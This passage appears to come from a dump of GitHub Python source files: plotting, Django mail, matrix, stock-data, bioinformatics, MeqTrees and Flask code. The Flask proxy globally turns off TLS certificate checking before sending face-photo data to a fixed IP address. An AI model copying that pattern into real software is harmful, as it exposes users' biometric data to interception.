Docs//Qual//qrw_script//'\r\n extension = \"xlsm\"\r\n os.chdir(path)\r\n all_xlsx_files = glob.glob('*.{}'.format(extension))\r\n return_arr = []\r\n for xlsx_file in all_xlsx_files:\r\n if str('test_initiator') in xlsx_file and '~$' not in xlsx_file:\r\n return_arr.append(xlsx_file)\r\n return_arr = ntSort(return_arr)\r\n return_path = path + return_arr[-1]\r\n os.chdir(ori_path)\r\n limits_path = return_path\r\n \r\n initiator = limits_path\r\n initiator_df = pd.read_excel(initiator, sheet_name = 'product_id')\r\n \r\n result_df_list = []\r\n if manual:\r\n result_df_master = inputdf.loc[(inputdf['Test Hours_Cycles'] == float(range_arr[0]))]\r\n else:\r\n result_df_master = inputdf.loc[(inputdf['Test Hours_Cycles'] == 1000)]\r\n\r\n filter_df = pd.read_excel(logger_finder.file_finder('merge_file_filter'))\r\n logger_df = pd.read_excel(logger_finder.get_logger())\r\n\r\n filter_df = filter_df.dropna(axis = 
1, how = 'all')\r\n filter_df_columns = filter_df.columns.tolist()\r\n filter_df_columns.remove('Test')\r\n filter_df_columns.remove('Product')\r\n \r\n pd.options.mode.chained_assignment = None # default='warn'\r\n for index, row in result_df_master.iterrows():\r\n for filter_df_col in filter_df_columns:\r\n target_row = logger_df.loc[(logger_df['UID'] == row['UID'])]\r\n target_info = str(target_row.loc[:,filter_df_col].iloc[0])\r\n result_df_master.loc[index,filter_df_col] = target_info\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n \r\n \r\n for test, df_test in result_df_master.groupby('Rel Test'):\r\n for volt, df_volt in df_test.groupby(filter_df_columns):\r\n result_df_list.append(df_volt)\r\n\r\n for result_df in result_df_list:\r\n result_df_test = str(list(dict.fromkeys(result_df.loc[:,'Rel Test'].tolist()))[0])\r\n result_df_conds = []\r\n result_df_conds.append(result_df_test)\r\n for filter_df_col_2 in filter_df_columns:\r\n cond = str(list(dict.fromkeys(result_df.loc[:,filter_df_col_2].tolist()))[0])\r\n result_df_conds.append(cond)\r\n \r\n joined_name = '_'.join(result_df_conds)\r\n print(joined_name)\r\n\r\n result_datecodes_list = result_df['YYWW_datecode'].tolist()\r\n result_datecodes_list = list(dict.fromkeys(result_datecodes_list))\r\n \r\n product_id_list = []\r\n series_id_list = []\r\n part_list = result_df['product'].tolist()\r\n for part in part_list:\r\n part_result_df = initiator_df.loc[(initiator_df['product'] == part)]\r\n prod_id = part_result_df['die']\r\n series_id = part_result_df['series']\r\n product_id_list.append(prod_id.to_string(index=False))\r\n series_id_list.append(series_id.to_string(index=False))\r\n\r\n series_id_list_cleaned = ntSort(list(dict.fromkeys(series_id_list)))\r\n\r\n pd.options.mode.chained_assignment = None # default='warn'\r\n result_df.loc[:,\"die\"] = product_id_list\r\n result_df.loc[:,\"series\"] = series_id_list\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n\r\n id_list_cleaned = series_id_list_cleaned\r\n\r\n df_list = []\r\n for region_2, df_region_2 in result_df.groupby('series'):\r\n df_list.append(df_region_2)\r\n\r\n desktop = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop')\r\n\r\n columns_arr = ['Rdson_aging(%)','Vth_aging(%)','Igss_rise(x)','Idoff_rise(x)']\r\n for c in columns_arr:\r\n pgB.printProgressBar(0, len(df_list), prefix = c + 'Graphs Progress:', suffix = 'Complete', length = 50)\r\n for i in range(len(df_list)):\r\n df_TEMP = df_list[i].copy()\r\n df_TEMP = df_TEMP.sort_values(by = ['YYWW_datecode'])\r\n if c == 'Rdson_aging(%)' or c == 'Vth_aging(%)':\r\n df_TEMP.loc[:,c] = df_TEMP.loc[:,c] * 100\r\n\r\n pd.options.mode.chained_assignment = None # default='warn'\r\n df_TEMP.loc[:,\"YYWW_datecode\"] = df_TEMP.loc[:,\"YYWW_datecode\"] + '_' + df_TEMP.loc[:,\"die\"]\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n\r\n df_TEMP_pal = df_TEMP[['YYWW_datecode','die']].copy()\r\n df_TEMP_pal = df_TEMP_pal.drop_duplicates()\r\n\r\n # constructs a colour palette based on number of devices\r\n pal_tuple_list = []\r\n palette_list = []\r\n palette_list_nodie = []\r\n die_list = df_TEMP_pal['die'].tolist()\r\n df_TEMP_pal_sub = df_TEMP_pal['die'].copy()\r\n df_TEMP_pal_sub = df_TEMP_pal_sub.drop_duplicates()\r\n df_TEMP_pal_sub_die = df_TEMP_pal_sub.tolist()\r\n total_colours_needed = len(df_TEMP_pal_sub_die)\r\n palette = sns.color_palette(\"hls\", total_colours_needed)\r\n for die_ind in range(len(df_TEMP_pal_sub_die)):\r\n 
pal_tuple_list.append((df_TEMP_pal_sub_die[die_ind],palette[die_ind]))\r\n\r\n for die_list_ind in range(len(die_list)):\r\n for pal_tuple in pal_tuple_list:\r\n if pal_tuple[0] == die_list[die_list_ind]:\r\n palette_list.append(pal_tuple)\r\n \r\n for pall in palette_list:\r\n palette_list_nodie.append(pall[1])\r\n \r\n palette = palette_list_nodie.copy()\r\n\r\n i_no_number = ''.join([ii for ii in str(i) if not ii.isdigit()])\r\n plt_filename = 'plt_' + joined_name + '_' + str(id_list_cleaned[i]) + '_' + str(i_no_number) + str(c)\r\n plt.figure(figsize=(30, 15))\r\n sns.set_theme(style=\"whitegrid\")\r\n plotname = 'plt_' + joined_name + '_' + str(i)\r\n plotname = sns.boxplot(x=\"YYWW_datecode\", y=c, data=df_TEMP, width=0.5, palette=palette)\r\n plotname.legend(labels = df_TEMP_pal_sub_die, loc=6, bbox_to_anchor=(1, 0.5), ncol=1, fontsize = 25)\r\n plotname.set_title(c + ' ' + joined_name + '_' + str(id_list_cleaned[i]), fontsize = 25)\r\n plotname.set_xlabel(\"YYWW_datecode_Product\", fontsize = 20)\r\n plotname.set_ylabel(c, fontsize = 20)\r\n plotname.set_xticklabels(plotname.get_xticklabels(),rotation = 90. , fontsize = 10)\r\n\r\n df_TEMP_ol = df_TEMP.copy()\r\n pd.options.mode.chained_assignment = None # default='warn'\r\n df_TEMP_ol.loc[:,\"YYWW_datecode\"] = df_list[i].loc[:,\"YYWW_datecode\"]\r\n pd.options.mode.chained_assignment = 'warn' # default='warn'\r\n\r\n #format: [interval_sel, rdsonul, rdsonll, rdsontf, vthul, vthll, vthtf, idofful, idoffll, idofftf, igssul, igssll, igsstf, dir_ent]\r\n default_ran_arr = ['1000', '150', '-50', '5', '50', '-50', '5', '50', '0', '2', '50', '0', '2']\r\n ran_arr = []\r\n if manual:\r\n ran_arr = range_arr.copy()\r\n else:\r\n ran_arr = default_ran_arr.copy()\r\n if c == 'Rdson_aging(%)':\r\n high_range = float(ran_arr[1])\r\n low_range = float(ran_arr[2])\r\n spacing = float(ran_arr[3])\r\n elif c == 'Vth_aging(%)':\r\n high_range = float(ran_arr[4])\r\n low_range = float(ran_arr[5])\r\n spacing = float(ran_arr[6])\r\n elif c == 'Idoff_rise(x)':\r\n high_range = float(ran_arr[7])\r\n low_range = float(ran_arr[8])\r\n spacing = float(ran_arr[9])\r\n elif c == 'Igss_rise(x)':\r\n high_range = float(ran_arr[10])\r\n low_range = float(ran_arr[11])\r\n spacing = float(ran_arr[12])\r\n plt.ylim(low_range, high_range)\r\n plt.yticks(np.arange(low_range, high_range, spacing))\r\n outlier_df_lower = df_TEMP_ol[(df_TEMP_ol[c] < low_range)]\r\n outlier_df_higher = df_TEMP_ol[(df_TEMP_ol[c] > high_range)]\r\n outlier_df = pd.concat([outlier_df_lower, outlier_df_higher])\r\n outlier_df = outlier_df[['YYWW_datecode','device', c]]\r\n if outlier_df.empty == False:\r\n decimals = 2 \r\n outlier_df[c] = outlier_df[c].apply(lambda x: round(x, decimals))\r\n plt.table(cellText=outlier_df.values,colWidths = [0.1]*len(outlier_df.columns),\r\n rowLabels=outlier_df.index,\r\n colLabels=outlier_df.columns,\r\n cellLoc = 'center', rowLoc = 'center',\r\n loc='best')\r\n\r\n # plt.show()\r\n if manual:\r\n plt.savefig(desktop + '\\\\REL_TREND_PLOTS\\\\' + plt_filename + '.png')\r\n else:\r\n plt.savefig('X:\\\\PLC\\\\Prod Docs\\\\Qual\\\\qrw_script\\\\Rel Trend Charts\\\\' + plt_filename + '.png')\r\n plt.close()\r\n pgB.printProgressBar(i + 1, len(df_list), prefix = c + 'Graphs Progress:', suffix = 'Complete', length = 50)\r\n\r\n#natural sort\r\ndef ntSort(input): \r\n convert = lambda text: int(text) if text.isdigit() else text\r\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\r\n return sorted(input, key = 
alphanum_key)\r\n","repo_name":"Astray909/rel_trend_plots","sub_path":"PythonModules/graph_plotter.py","file_name":"graph_plotter.py","file_ext":"py","file_size_in_byte":10034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4435840972","text":"from django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\n\ndef send_article_email(article, user):\n subject = f'Новая статья в категории {article.category.name}'\n html_message = render_to_string('mail/new_article.html', {'article': article})\n plain_message = strip_tags(html_message)\n send_mail(subject, plain_message, 'your_email@example.com', [user.email], html_message=html_message)\n\n\ndef send_weekly_articles_email(category, articles, user):\n subject = f'Новые статьи в категории {category.name}'\n html_message = render_to_string('mail/weekly_articles.html', {'category': category, 'articles': articles})\n plain_message = strip_tags(html_message)\n send_mail(subject, plain_message, 'your_email@example.com', [user.email], html_message=html_message)\n","repo_name":"dodu204/News_Portal_D9.5.4","sub_path":"news_portal/news_app/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18451402604","text":"\"\"\"\nA matrix will be an N sized list of 4 element lists.\nEach individual list will represent an [x, y, z, 1] point.\nFor multiplication purposes, consider the lists like so:\nx0 x1 xn\ny0 y1 yn\nz0 z1 ... zn\n1 1 1\n\"\"\"\nimport math\n\n#print the matrix such that it looks like\n#the template in the top comment\ndef print_matrix( matrix ):\n s = \"\"\n for i in range(4):\n for point in matrix:\n s = s + str(float(point[i])) + \" \"\n s = s + \"\\n\"\n print(s)\n\n#turn the paramter matrix into an identity matrix\n#you may assume matrix is square\ndef ident( matrix ):\n side = len(matrix)\n for i in range(side):\n matrix[i][i] = 1.000\n for r in range(side):\n for c in range(side):\n if r !=c :\n matrix[r][c] = 0\n\n#multiply m1 by m2, modifying m2 to be the product\n#m1 * m2 -> m2\ndef matrix_mult( m1, m2 ):\n for r in range(len(m2)):\n m2[r] = multi_helper(m1, m2[r])\n\ndef multi_helper(m1, m2 ):\n final = []\n for i in range(len(m1)):\n sum = 0\n for c in range(len(m1[0])):\n sum = sum + (m1[c][i] * m2[c])\n final.append(sum)\n return final\n\n\ndef new_matrix(rows = 4, cols = 4):\n m = []\n for c in range( cols ):\n m.append( [] )\n for r in range( rows ):\n m[c].append( 0 )\n return m\n","repo_name":"vivianhuynh91827/02matrix","sub_path":"matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39710962297","text":"import numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\n\nimport tradepy\nfrom tradepy import LOG\nfrom tradepy.depot.stocks import StocksDailyBarsDepot, StockListingDepot\nfrom tradepy.collectors.base import DayBarsCollector\n\n\nclass StockDayBarsCollector(DayBarsCollector):\n bars_depot_class = StocksDailyBarsDepot\n listing_depot_class = StockListingDepot\n\n def _compute_mkt_cap_percentile_ranks(self, df: pd.DataFrame):\n for _, day_df in tqdm(df.groupby(level=\"timestamp\")):\n if (\"mkt_cap_rank\" in day_df) and (day_df[\"mkt_cap_rank\"].notnull().all()):\n yield day_df\n continue\n\n mkt_cap_lst = [row.mkt_cap for row in 
day_df.itertuples()]\n\n mkt_cap_percentiles = np.percentile(mkt_cap_lst, q=range(100))\n day_df[\"mkt_cap_rank\"] = [\n (mkt_cap_percentiles < v).sum() / len(mkt_cap_percentiles)\n for v in mkt_cap_lst\n ]\n yield day_df\n\n def run(self, batch_size=50, iteration_pause=5):\n LOG.info(\"=============== 开始更新个股日K数据 ===============\")\n jobs = list(self.jobs_generator())\n\n results_gen = self.run_batch_jobs(\n jobs,\n batch_size,\n iteration_pause=iteration_pause,\n fun=tradepy.ak_api.get_stock_daily,\n )\n for args, bars_df in results_gen:\n if bars_df.empty:\n LOG.info(f\"找不到{args['code']}日K数据. Args = {args}\")\n else:\n code = args[\"code\"]\n self.repo.append(bars_df, f\"{code}.csv\")\n\n LOG.info(\"计算个股的每日市值分位\")\n df = self.repo.load(index_by=\"timestamp\", fields=\"all\")\n df = pd.concat(self._compute_mkt_cap_percentile_ranks(df))\n df.reset_index(inplace=True, drop=True)\n\n LOG.info(\"保存中\")\n for code, sub_df in df.groupby(\"code\"):\n sub_df.drop(\"code\", axis=1, inplace=True)\n assert isinstance(code, str)\n self.repo.save(sub_df, filename=code + \".csv\")\n","repo_name":"namoshizun/TradePy","sub_path":"tradepy/collectors/stock_day_bars.py","file_name":"stock_day_bars.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"4123741799","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\northogroup_df = pd.read_csv(\"orthofinder/Orthogroups/Orthogroups.tsv\", sep=\"\\t\")\nsp1_ortho_df = orthogroup_df[['Orthogroup', 'iphiclides_feisthamelii.pep']]\nsp2_ortho_df = orthogroup_df[['Orthogroup', 'iphiclides_podalirius.pep']]\n\nsp1_ortho_df_split = sp1_ortho_df['iphiclides_feisthamelii.pep'].str.split(', ', expand = True)\nsp1_ortho_df_split['Orthogroup'] = sp1_ortho_df['Orthogroup']\nsp1_ortho_df_melt = sp1_ortho_df_split.melt(id_vars = 'Orthogroup').sort_values(by=['Orthogroup', 'variable'])\nsp1_ortho_df_melt.columns = ['orthogroup','protein_number','protein_name']\n\nsp2_ortho_df_split = sp2_ortho_df['iphiclides_podalirius.pep'].str.split(', ', expand = True)\nsp2_ortho_df_split['Orthogroup'] = sp2_ortho_df['Orthogroup']\nsp2_ortho_df_melt = sp2_ortho_df_split.melt(id_vars = 'Orthogroup').sort_values(by=['Orthogroup', 'variable'])\nsp2_ortho_df_melt.columns = ['orthogroup','orthogroup_protein_number','protein_name']\n\nsco_list = pd.read_csv(\"SCO_list.txt\", header = None)\nsco_list.columns = ['orthogroup']\nsco_list['SCO_index'] = 1\n\nsp1_sco_merge = pd.merge(sp1_ortho_df_melt.mask(sp1_ortho_df_melt.eq('None')).dropna(), sco_list, on = 'orthogroup', how = \"outer\")\nsp2_sco_merge = pd.merge(sp2_ortho_df_melt.mask(sp2_ortho_df_melt.eq('None')).dropna(), sco_list, on = 'orthogroup', how = \"outer\")\n\nwith open(\"sp1_orthogroups.txt\", \"w\") as f:\n sp1_sco_merge.to_csv(f, sep=\"\\t\", index=False, na_rep=\"0\")\n\nwith open(\"sp2_orthogroups.txt\", \"w\") as f:\n sp2_sco_merge.to_csv(f, sep=\"\\t\", index=False, na_rep=\"0\")\n\n# incoporate unit testing to check if SCO in the output file are correct and whether things are missing that should not be\n","repo_name":"samebdon/samparse","sub_path":"scripts/orthogroup_wide_to_long.py","file_name":"orthogroup_wide_to_long.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14585816117","text":"class AnswerType:\n identical = \"identical\"\n reversed = \"reversed\"\n distance_1 = \"distance_1\"\n 
distance_2 = \"distance_2\"\n distance_3 = \"distance_3\"\n\n\nstimulus_category = [\"male\", \"female\"]\nstimulus_names = {\"male\": [\"Darek\", \"Olek\", \"Wojtek\", \"Edek\", \"Jacek\", \"Bronek\", \"Tomek\", \"Leszek\"],\n \"female\": [\"Hania\", \"Daria\", \"Basia\", \"Zuzia\", \"Olga\", \"Ada\", \"Fela\", \"Klara\"]}\n\nstimulus_types = {\"male\": [{\"lower\": \"niższy niż\", \"higher\": \"wyższy niż\", \"type_name\": \"wzrost\"},\n {\"lower\": \"młodszy niż\", \"higher\": \"starszy niż\", \"type_name\": \"wiek\"},\n {\"lower\": \"chudszy niż\", \"higher\": \"grubszy niż\", \"type_name\": \"masa\"},\n {\"lower\": \"wolniejszy niż\", \"higher\": \"szybszy niż\", \"type_name\": \"szybkosc\"},\n {\"lower\": \"głupszy niż\", \"higher\": \"mądrzejszy niż\", \"type_name\": \"inteligencja\"},\n {\"lower\": \"biedniejszy niż\", \"higher\": \"bogatszy niż\", \"type_name\": \"zamoznosc\"}],\n \"female\": [{\"lower\": \"niższa niż\", \"higher\": \"wyższa niż\", \"type_name\": \"wzrost\"},\n {\"lower\": \"młodsza niż\", \"higher\": \"starsza niż\", \"type_name\": \"wiek\"},\n {\"lower\": \"chudsza niż\", \"higher\": \"grubsza niż\", \"type_name\": \"masa\"},\n {\"lower\": \"wolniejsza niż\", \"higher\": \"szybsza niż\", \"type_name\": \"szybkosc\"},\n {\"lower\": \"głupsza niż\", \"higher\": \"mądrzejsza niż\", \"type_name\": \"inteligencja\"},\n {\"lower\": \"biedniejsza niż\", \"higher\": \"bogatsza niż\", \"type_name\": \"zamoznosc\"}]}\n","repo_name":"cogscilab-experiment-y/Transrel_verbal","sub_path":"code/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72040580327","text":"import sys\nimport atexit\nimport traceback\nfrom Timba.Meq import meqds\n\n# first things first: setup app defaults from here and from\n# command line (this has to go first, as other modules being imported\n# may depend on app_defaults settings)\nfrom Timba.Apps import app_defaults\nif app_defaults.include_gui:\n try:\n from MeqGUI.GUI import meqserver_gui\n from MeqGUI.GUI.meqserver_gui import *\n except ImportError:\n print(\"*** Error importing GUI modules:\");\n pass;\n\n# #-------- update default debuglevels\n# app_defaults.debuglevels.update({\n# 'MeqNode' :2,\n# 'MeqForest' :2,\n# 'MeqSink' :2,\n# 'MeqSpigot' :2,\n# 'MeqVisHandler':2,\n# 'MeqServer' :2,\n# 'meqserver' :1 \n# });\n# \n\n#-------- parse command line\nif __name__ == '__main__':\n app_defaults.parse_argv(sys.argv[1:]);\n\nimport traceback\nimport os\nimport string\nimport time\nfrom Timba import octopussy\nfrom Timba import mequtils\nfrom Timba.pretty_print import PrettyPrinter\nfrom Timba.Apps.multiapp_proxy import multiapp_proxy\nfrom Timba.dmi import *\nfrom Timba.utils import *\nfrom Timba.Meq import meq\n\n\n# default spawn arguments (for spawn=True)\ndefault_spawn = (\"meqserver\");\ndefault_spawn_opt = (\"meqserver-opt\");\ndefault_launch = ();\n\nclass meqserver (multiapp_proxy):\n \"\"\"interface to MeqServer app\"\"\";\n def __init__(self,appid='meqserver',client_id='meqclient',\n spawn=None,opt=False,**kwargs):\n if spawn and isinstance(spawn,bool):\n if opt:\n spawn = default_spawn_opt;\n else:\n spawn = default_spawn;\n # set gui arg\n if 'gui' in kwargs and kwargs['gui'] and not callable(kwargs['gui']):\n kwargs['gui'] = meqserver_gui;\n self._we_track_results = None;\n # init base class \n multiapp_proxy.__init__(self,appid,client_id,spawn=spawn,**kwargs);\n # setup own state\n self._pprint = 
PrettyPrinter(width=78,stream=sys.stderr);\n # track axis map changes\n self._we_axis_list = self.whenever('axis.list',self._axis_list_handler);\n # if base/gui init() has explicitly disabled result tracking, _we_track_results\n # will be False rather than None\n if self.get_verbose() > 0 and self._we_track_results is None:\n self.dprint(1,'verbose>0: auto-enabling node_result output');\n self.track_results(True);\n self.dprint(1,'you can disable this by calling .track_results(False)');\n \n # define meqserver-specific methods\n def meq (self,command,args=None,wait=None,silent=False):\n \"\"\"sends a meq-command and optionally waits for result.\n wait can be specified in seconds, or True to wait indefinitely.\"\"\";\n command = make_hiid(command);\n payload = record();\n if args is not None:\n payload.args = args;\n # send command and wait for reply\n if wait:\n if isinstance(wait,bool):\n wait = None; # timeout=None means block indefinitely\n if silent:\n self.dprint(0,'warning: both wait and silent specified, ignoring silent flag');\n payload.command_index = self.new_command_index();\n replyname = 'result' + command + payload.command_index;\n self.dprintf(3,'sending command %s with wait\\n',command);\n self.dprint(5,'arguments are ',args);\n self.pause_events();\n self.send_command('command'+command,payload);\n msg = self.await_(replyname,resume=True,timeout=wait);\n return msg.payload;\n # else simply send command\n else: \n self.dprintf(3,'sending command %s with no wait, silent=%d\\n',command,silent);\n self.dprint(5,'arguments are ',args);\n payload.silent = silent;\n self.send_command('command'+command,payload);\n \n # helper function to create a node specification record\n def makenodespec (self,node):\n \"makes an record( containing a node specification\";\n if isinstance(node,str):\n return record(name=node);\n elif isinstance(node,int):\n return record(nodeindex=node);\n else:\n raise TypeError('node must be specified by name or index, have '+str(type(node)));\n\n def createnode (self,initrec,wait=False,silent=False):\n initrec = make_record(initrec);\n return self.meq('Create.Node',initrec,wait=wait,silent=silent);\n \n def getnodestate (self,node,wait=True,sync=False):\n spec = self.makenodespec(node);\n spec.sync = sync;\n return self.meq('Node.Get.State',spec,wait=wait);\n\n def setnodestate (self,node,fields_record,wait=False,sync=True):\n spec = self.makenodespec(node);\n spec.sync = sync;\n spec.state = fields_record;\n return self.meq('Node.Set.State',spec,wait=wait);\n \n def getnodeindex (self,name):\n retval = self.meq('Get.NodeIndex',self.makenodespec(name),wait=True);\n try: return retval.nodeindex;\n except:\n raise ValueError('MeqServer did not return a nodeindex field');\n\n def getnodelist (self,name=True,nodeindex=True,classname=True,children=False):\n rec = record({'name':name,'nodeindex':nodeindex,'class':classname,'children':children});\n return self.meq('Get.Node.List',rec,wait=True);\n \n def execute (self,node,req,wait=False):\n rec = self.makenodespec(node);\n rec.request = req;\n return self.meq('Node.Execute',rec,wait=wait);\n \n def clearcache (self,node,recursive=True,wait=False,sync=True):\n rec = self.makenodespec(node);\n rec.recursive = recursive;\n rec.sync = sync;\n return self.meq('Node.Clear.Cache',rec,wait=wait);\n \n def change_wd (self,path):\n rec = record(cwd=path);\n return self.meq('Set.Cwd',rec,wait=False);\n \n def publish (self,node,wait=False):\n rec = self.makenodespec(node);\n rec.level = 1;\n return 
self.meq('Node.Set.Publish.Level',rec,wait=wait);\n \n def _event_handler (self,msg):\n \"\"\"Auguments app_proxy._event_handler(), to keep track of forest state\"\"\";\n multiapp_proxy._event_handler(self,msg);\n payload = msg.payload;\n if self.current_server \\\n and getattr(msg,'from') == self.current_server.addr \\\n and isinstance(payload,record):\n # check if message includes update of forest state and/or status\n fstatus = getattr(payload,'forest_status',None);\n fstate = getattr(payload,'forest_state',None);\n # update forest state, if supplied. Merge in the forest status if\n # we also have it\n if fstate is not None:\n if fstatus is not None:\n fstate.update(fstatus);\n meqds.update_forest_state(fstate);\n # no forest state supplied but a status is: merge it in\n elif fstatus is not None:\n meqds.update_forest_state(fstatus,merge=True);\n \n def _result_handler (self,msg):\n try:\n value = msg.payload;\n dprint(0,'============= result for node: ',value.name);\n self._pprint.pprint(value);\n except:\n print('exception in meqserver._result_handler: ',sys.exc_info());\n traceback.print_exc();\n \n def _axis_list_handler (self,msg):\n try:\n if self.current_server \\\n and getattr(msg,'from') == self.current_server.addr: \\\n mequtils.set_axis_list(msg.payload);\n except:\n print('exception in meqserver._axis_list_handler: ',sys.exc_info());\n traceback.print_exc();\n \n def track_results (self,enable=True):\n if enable:\n self.dprint(2,'auto-printing all node_result events');\n if self._we_track_results:\n self._we_track_results.activate();\n else:\n self._we_track_results = self.whenever('node.result',self._result_handler);\n else: # disable\n self.dprint(2,'disabling auto-printing of node_result events');\n if self._we_track_results:\n self._we_track_results.deactivate();\n self._we_track_results = False;\n\nmqs = None;\n\n# inits a meqserver\ndef default_mqs (debug={},nokill=False,extra=None,**kwargs):\n global mqs;\n if not isinstance(mqs,meqserver):\n # create a local tcp port\n gwlocal = \"=meqbatch-%d\"%os.getpid();\n # start octopussy if needed\n if not octopussy.is_initialized():\n octopussy.init(gwclient=False,gwtcp=0,gwlocal=gwlocal+\":1\");\n if not octopussy.is_running():\n octopussy.start(wait=True);\n # start meqserver, overriding default args with any kwargs\n args = record(**app_defaults.args);\n args.update(kwargs);\n # add gwpeer= argument\n if isinstance(extra,str):\n extra = args.extra + extra.split(' ');\n extra = (extra or []) + [\"-gw\",gwlocal];\n spawn = args.get('spawn',None);\n mqs = meqserver(extra=extra,**args);\n mqs.dprint(1,'default meqserver args:',args);\n meqds.set_meqserver(mqs);\n if not nokill:\n atexit.register(stop_default_mqs);\n if debug is None:\n pass;\n else:\n octopussy.set_debug(app_defaults.debuglevels);\n if isinstance(debug,dict):\n octopussy.set_debug(debug);\n return mqs;\n \ndef stop_default_mqs ():\n global mqs;\n if mqs: \n if mqs.current_server:\n mqs.dprint(1,\"stopping default meqserver\");\n mqs.halt();\n mqs.disconnect();\n # kill process if it is still running after 10 seconds\n if mqs.serv_pid:\n for i in range(20):\n pid,stat = os.waitpid(mqs.serv_pid,os.WNOHANG);\n if pid:\n break;\n mqs.dprint(0,\"meqserver not exited yet, waiting another 10 seconds\");\n time.sleep(10);\n else:\n mqs.dprint(0,\"meqserver not exiting cleanly after 200 seconds, killing it\");\n os.kill(mqs.serv_pid,9);\n pid,stat = os.waitpid(mqs.serv_pid,os.WNOHANG);\n mqs = None;\n if octopussy.is_running():\n octopussy.stop();\n \n \n#\n# self-test 
block\n#\nif __name__ == '__main__':\n app_defaults.parse_argv(sys.argv[1:]);\n gui = app_defaults.args['gui'];\n\n default_mqs(verbose=2,wp_verbose=2);\n for i in range(1,10):\n print('createnode:',mqs.createnode(meq.node('MeqConstant','x'+str(i),value=0),wait=False));\n\n if gui:\n mqs.run_gui(); \n else:\n time.sleep(2);\n\n print('================= stopping mqs');\n mqs.halt();\n mqs.disconnect();\n\n print(\"===== calling octopussy.stop() =====\");\n octopussy.stop();\n\n","repo_name":"ratt-ru/meqtrees-timba","sub_path":"PyApps/src/Apps/meqserver.py","file_name":"meqserver.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4046608732","text":"from flask import Flask,render_template,request\nfrom urllib import request as req,parse\nimport ssl\nssl._create_default_https_context=ssl._create_unverified_context\napp=Flask(__name__)\n# 首页对应的页面\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n# 采集的数据送往的地址\n@app.route(\"/send\",methods=[\"POST\"])\ndef send():\n data=parse.urlencode(request.form).encode(\"utf8\")\n print(data)\n res=req.urlopen(\"https://118.190.150.35:5000/api/photo\",data=data)\n con=res.read()\n print(con)\n return con\n\n# 要对比的地址\n@app.route(\"/check\",methods=[\"POST\"])\ndef check():\n data=parse.urlencode(request.form).encode(\"utf8\")\n print(data)\n res=req.urlopen(\"https://118.190.150.35:5000/api/check\",data=data)\n con=res.read()\n print(con)\n return con\napp.run()","repo_name":"yueyingjun/changzhi_face","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71809745129","text":"file = open(\"Day9-1.txt\", \"r\")\nf = file.read()\nlines = f.split('\\n')\nnums = []\nfor line in lines:\n nums.append(int(line))\n\n\npreambleLength = 25\n\nfor i in range(preambleLength, len(nums)):\n preamble = nums[i-preambleLength:i]\n preamble.sort()\n li = 0\n hi = preambleLength - 1\n valid = False\n while li != hi:\n if nums[i] > preamble[li] + preamble[hi]:\n li+=1\n continue\n if nums[i] < preamble[li] + preamble[hi]:\n hi-=1\n continue\n if nums[i] == preamble[li] + preamble[hi]:\n valid = True\n break\n if not valid:\n print(\"----------\")\n print(preamble)\n print(nums[i])","repo_name":"luke-leonard/CodeAdvent","sub_path":"2020/Day09/Day9-1.py","file_name":"Day9-1.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11607555757","text":"import cv2\nimport numpy as np\nimport torch\nimport math\nimport os\nimport random\nimport time\nimport torchvision\n\ndef xywh2xyxy(x):\n # Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x\n y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y\n y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x\n y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y\n return y\n\ndef xyxy2xywh(x):\n # Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right\n y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)\n y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center\n y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center\n y[:, 2] = x[:, 2] - x[:, 0] # width\n y[:, 3] = x[:, 3] - x[:, 1] # height\n return y\n\ndef 
